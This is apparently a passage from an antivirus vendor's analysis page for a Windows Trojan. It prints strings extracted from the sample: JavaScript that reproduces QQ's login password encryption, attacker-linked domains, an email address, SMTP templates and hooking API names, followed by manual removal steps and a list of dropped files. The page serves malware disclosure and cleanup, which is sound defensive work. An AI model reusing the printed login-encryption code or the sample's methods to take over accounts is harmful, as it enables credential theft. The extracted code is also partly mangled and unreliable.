function k(C){var B,D,A=[],z=C.length;for(B=0;B<z;B  ){D=C.charCodeAt(B);if(D>0&&D<=127){A.push(C.charAt(B))}else{if(D>=128&&D<=2047){A.push(String.fromCharCode(192|((D>>6)&31)),String.fromCharCode(128|(D&63)))}else{if(D>=2048&&D<=65535){A.push(String.fromCharCode(224|((D>>12)&15)),String.fromCharCode(128|((D>>6)&63)),String.fromCharCode(128|(D&63)))}}}}
return A.join('')}
function h(B){g=new Array(8);x=new Array(8);y=u=0;n=true;a=0;var z=B.length;var C=0;a=(z 10)%8;if(a!=0){a=8-a}
function q(D){var C=0;var A=new Array(8);var z=D.length;t=D;if(z%8!=0||z<16){return null}
for(var B=0;B<A.length;B  ){A[B]=0}
function f(){var z=t.length;for(var A=0;A<8;A  ){x[A]^=t[y A]}
function o(D,C){var B=[];if(C){for(var A=0;A<D.length;A  ){B[A]=D.charCodeAt(A)&255}}else{var z=0;for(var A=0;A<D.length;A =2){B[z  ]=parseInt(D.substr(A,2),16)}}
r.TEA={encrypt:function(C,B){var A=o(C,B);var z=h(A);return w(z)},enAsBase64:function(E,D){var C=o(E,D);var B=h(C);var z='';for(var A=0;A<B.length;A  ){z =String.fromCharCode(B[A])}
return d.encode(z)},decrypt:function(B){var A=o(B,false);var z=q(A);return w(z)},initkey:function(z,A){s=o(z,A)},bytesToStr:v,strToBytes:c,bytesInStr:w,dataFromStr:o};var d={};d.PADCHAR='=';d.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';d.getbyte=function(B,A){var z=B.charCodeAt(A);if(z>255){throw'INVALID_CHARACTER_ERR: DOM Exception 5'}
return z};d.encode=function(D){if(arguments.length!=1){throw'SyntaxError: Not enough arguments'}
var A=d.PADCHAR;var F=d.ALPHA;var E=d.getbyte;var C,G;var z=[];D='' D;var B=D.length-D.length%3;if(D.length==0){return D}
for(C=0;C<B;C =3){G=(E(D,C)<<16)|(E(D,C 1)<<8)|E(D,C 2);z.push(F.charAt(G>>18));z.push(F.charAt((G>>12)&63));z.push(F.charAt((G>>6)&63));z.push(F.charAt(G&63))}
switch(D.length-B){case 1:G=E(D,C)<<16;z.push(F.charAt(G>>18) F.charAt((G>>12)&63) A A);break;case 2:G=(E(D,C)<<16)|(E(D,C 1)<<8);z.push(F.charAt(G>>18) F.charAt((G>>12)&63) F.charAt((G>>6)&63) A);break}
return z.join('')};if(!window.btoa){window.btoa=d.encode}})(window);var hexcase=1;var b64pad='';var chrsz=8;var mode=32;function md5(s){return hex_md5(s)}
function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz))}
function str_md5(s){return binl2str(core_md5(str2binl(s),s.length*chrsz))}
function hex_hmac_md5(key,data){return binl2hex(core_hmac_md5(key,data))}
function b64_hmac_md5(key,data){return binl2b64(core_hmac_md5(key,data))}
function str_hmac_md5(key,data){return binl2str(core_hmac_md5(key,data))}
function core_md5(x,len){x[len>>5]|=128<<((len)2);x[(((len 64)>>>9)<<4) 14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i =16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i 0],7,-680876936);d=md5_ff(d,a,b,c,x[i 1],12,-389564586);c=md5_ff(c,d,a,b,x[i 2],17,606105819);b=md5_ff(b,c,d,a,x[i 3],22,-1044525330);a=md5_ff(a,b,c,d,x[i 4],7,-176418897);d=md5_ff(d,a,b,c,x[i 5],12,1200080426);c=md5_ff(c,d,a,b,x[i 6],17,-1473231341);b=md5_ff(b,c,d,a,x[i 7],22,-45705983);a=md5_ff(a,b,c,d,x[i 8],7,1770035416);d=md5_ff(d,a,b,c,x[i 9],12,-1958414417);c=md5_ff(c,d,a,b,x[i 10],17,-42063);b=md5_ff(b,c,d,a,x[i 11],22,-1990404162);a=md5_ff(a,b,c,d,x[i 12],7,1804603682);d=md5_ff(d,a,b,c,x[i 13],12,-40341101);c=md5_ff(c,d,a,b,x[i 14],17,-1502002290);b=md5_ff(b,c,d,a,x[i 15],22,1236535329);a=md5_gg(a,b,c,d,x[i 1],5,-165796510);d=md5_gg(d,a,b,c,x[i 6],9,-1069501632);c=md5_gg(c,d,a,b,x[i 11],14,643717713);b=md5_gg(b,c,d,a,x[i 0],20,-373897302);a=md5_gg(a,b,c,d,x[i 5],5,-701558691);d=md5_gg(d,a,b,c,x[i 10],9,38016083);c=md5_gg(c,d,a,b,x[i 15],14,-660478335);b=md5_gg(b,c,d,a,x[i 4],20,-405537848);a=md5_gg(a,b,c,d,x[i 9],5,568446438);d=md5_gg(d,a,b,c,x[i 14],9,-1019803690);c=md5_gg(c,d,a,b,x[i 3],14,-187363961);b=md5_gg(b,c,d,a,x[i 8],20,1163531501);a=md5_gg(a,b,c,d,x[i 13],5,-1444681467);d=md5_gg(d,a,b,c,x[i 2],9,-51403784);c=md5_gg(c,d,a,b,x[i 7],14,1735328473);b=md5_gg(b,c,d,a,x[i 12],20,-1926607734);a=md5_hh(a,b,c,d,x[i 5],4,-378558);d=md5_hh(d,a,b,c,x[i 8],11,-2022574463);c=md5_hh(c,d,a,b,x[i 11],16,1839030562);b=md5_hh(b,c,d,a,x[i 14],23,-35309556);a=md5_hh(a,b,c,d,x[i 1],4,-1530992060);d=md5_hh(d,a,b,c,x[i 4],11,1272893353);c=md5_hh(c,d,a,b,x[i 7],16,-155497632);b=md5_hh(b,c,d,a,x[i 10],23,-1094730640);a=md5_hh(a,b,c,d,x[i 13],4,681279174);d=md5_hh(d,a,b,c,x[i 0],11,-358537222);c=md5_hh(c,d,a,b,x[i 3],16,-722521979);b=md5_hh(b,c,d,a,x[i 6],23,76029189);a=md5_hh(a,b,c,d,x[i 9],4,-640364487);d=md5_hh(d,a,b,c,x[i 12],11,-421815835);c=md5_hh(c,d,a,b,x[i 15],16,530742520);b=md5_hh(b,c,d,a,x[i 2],23,-995338651);a=md5_ii(a,b,c,d,x[i 0],6,-198630844);d=md5_ii(d,a,b,c,x[i 7],10,1126891415);c=md5_ii(c,d,a,b,x[i 14],15,-1416354905);b=md5_ii(b,c,d,a,x[i 5],21,-57434055);a=md5_ii(a,b,c,d,x[i 12],6,1700485571);d=md5_ii(d,a,b,c,x[i 3],10,-1894986606);c=md5_ii(c,d,a,b,x[i 10],15,-1051523);b=md5_ii(b,c,d,a,x[i 1],21,-2054922799);a=md5_ii(a,b,c,d,x[i 8],6,1873313359);d=md5_ii(d,a,b,c,x[i 15],10,-30611744);c=md5_ii(c,d,a,b,x[i 6],15,-1560198380);b=md5_ii(b,c,d,a,x[i 13],21,1309151649);a=md5_ii(a,b,c,d,x[i 4],6,-145523070);d=md5_ii(d,a,b,c,x[i 11],10,-1120210379);c=md5_ii(c,d,a,b,x[i 2],15,718787259);b=md5_ii(b,c,d,a,x[i 9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd)}
function core_hmac_md5(key,data){var bkey=str2binl(key);if(bkey.length>16){bkey=core_md5(bkey,key.length*chrsz)}
var ipad=Array(16),opad=Array(16);for(var i=0;i<16;i  ){ipad[i]=bkey[i]^909522486;opad[i]=bkey[i]^1549556828}
var hash=core_md5(ipad.concat(str2binl(data)),512 data.length*chrsz);return core_md5(opad.concat(hash),512 128)}
function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i =chrsz){bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i2)}
function binl2str(bin){var str='';var mask=(1<<chrsz)-1;for(var i=0;i<bin.length*32;i =chrsz){str =String.fromCharCode((bin[i>>5]>>>(i2))&mask)}
function binl2hex(binarray){var hex_tab=hexcase?'0123456789ABCDEF':'0123456789abcdef';var str='';for(var i=0;i<binarray.length*4;i  ){str =hex_tab.charAt((binarray[i>>2]>>((i%4)*8 4))&15) hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&15)}
function binl2b64(binarray){var tab='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';var str='';for(var i=0;i<binarray.length*4;i =3){var triplet=(((binarray[i>>2]>>8*(i%4))&255)<<16)|(((binarray[i 1>>2]>>8*((i 1)%4))&255)<<8)|((binarray[i 2>>2]>>8*((i 2)%4))&255);for(var j=0;j<4;j  ){if(i*8 j*6>binarray.length*32){str =b64pad}else{str =tab.charAt((triplet>>6*(3-j))&63)}}}
function hexchar2bin(str){var arr=[];for(var i=0;i<str.length;i=i 2){arr.push('\\x' str.substr(i,2))}
arr=arr.join('');eval('var temp = \'' arr '\'');return temp}
function __monitor(mid,probability){if(Math.random()>(probability||1)){return}
try{var url=location.protocol '//ui.ptlogin2.qq.com/cgi-bin/report?id=' mid;var s=document.createElement('img');s.src=url}catch(e){}}
function getEncryption(password,salt,vcode){salt=uin2hex(salt);vcode=vcode||'';password=password||'';var md5Pwd=md5(password),h1=hexchar2bin(md5Pwd),s2=md5(h1 salt),rsaH1=$pt.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=r.TEA.strToBytes(vcode.toUpperCase(),true),vcodeLen=Number(hexVcode.length/2).toString(16);while(vcodeLen.length<4){vcodeLen='0' vcodeLen}
while(rsaH1Len.length<4){rsaH1Len='0' rsaH1Len}
r.TEA.initkey(s2);var saltPwd=r.TEA.enAsBase64(rsaH1Len rsaH1 r.TEA.strToBytes(salt) vcodeLen hexVcode);r.TEA.initkey('');return saltPwd.replace(/[\/\ =]/g,function(a){return{'/':'-',' ':'*','=':'_'}[a]})}
function uin2hex(str){var maxLength=16;var hex=parseInt(str).toString(16);var len=hex.length;for(var i=len;i<maxLength;i  ){hex="0" hex}
var arr=[];for(var j=0;j<maxLength;j =2){arr.push("\\x" hex.substr(j,2))}
var result=arr.join("");eval('result="' result '"');return result}getEncryption
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=21-43-1443602837456&js_ver=10135&js_type=1&login_sig=bX2vEC1My7mgtm3kIVH0UY57UQiklmQQaaq2BdbCVtd39fDjGGywlyInOnozDIje&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
&js_ver=10135&js_type=1&login_sig=&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-23-
function time(){return Math.random()}
VBScript.RegExp
km.7532.com
shenglin_yu@126.com
VVV.7532.com
VVV.7532.comt
7532.com
|*.txt
%d&&'
123456789
00003333
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
windows
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
GetProcessHeap
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
oledlg.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
;3 #>6.&
'2, / 0&7!4-)1#
VVV.dywt.com.cn
(*.htm;*.html)|*.htm;*.html
its:%s::%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCResourceException@@
%d-%d-%d
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.jpg;*.bmp;*.gif;*.ico;*.cur|JPG
(*.JPG)|*.jpg|BMP
(*.BMP)|*.bmp|GIF
(*.GIF)|*.gif|
(*.ICO)|*.ico|
(*.CUR)|*.cur||
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
3 ,,25%!4
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
1, 0, 6, 6
!"#$%&'()* ,-
25, 0, 0, 1
Windows
Grid.Document
(*.*)
4.4.0.0

%original file name%.exe_3404_rwx_10001000_00039000:

L$(h%f
SSh0j
hu2.iu
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G8CYUMX5.txt (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXGBCMD7.txt (99 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3748 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (77 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxs11[1].htm (825 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxszgg1[1].htm (1380 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
    C:\dc.dll (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssxs13[1].htm (508 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssxs12[1].htm (1283 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ssxsz[1].htm (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (76 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1461 bytes)
    C:\SkinH_EL.dll (178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GZOJPSMC.txt (233 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssggd[1].htm (106 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 3 (1 vote)


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now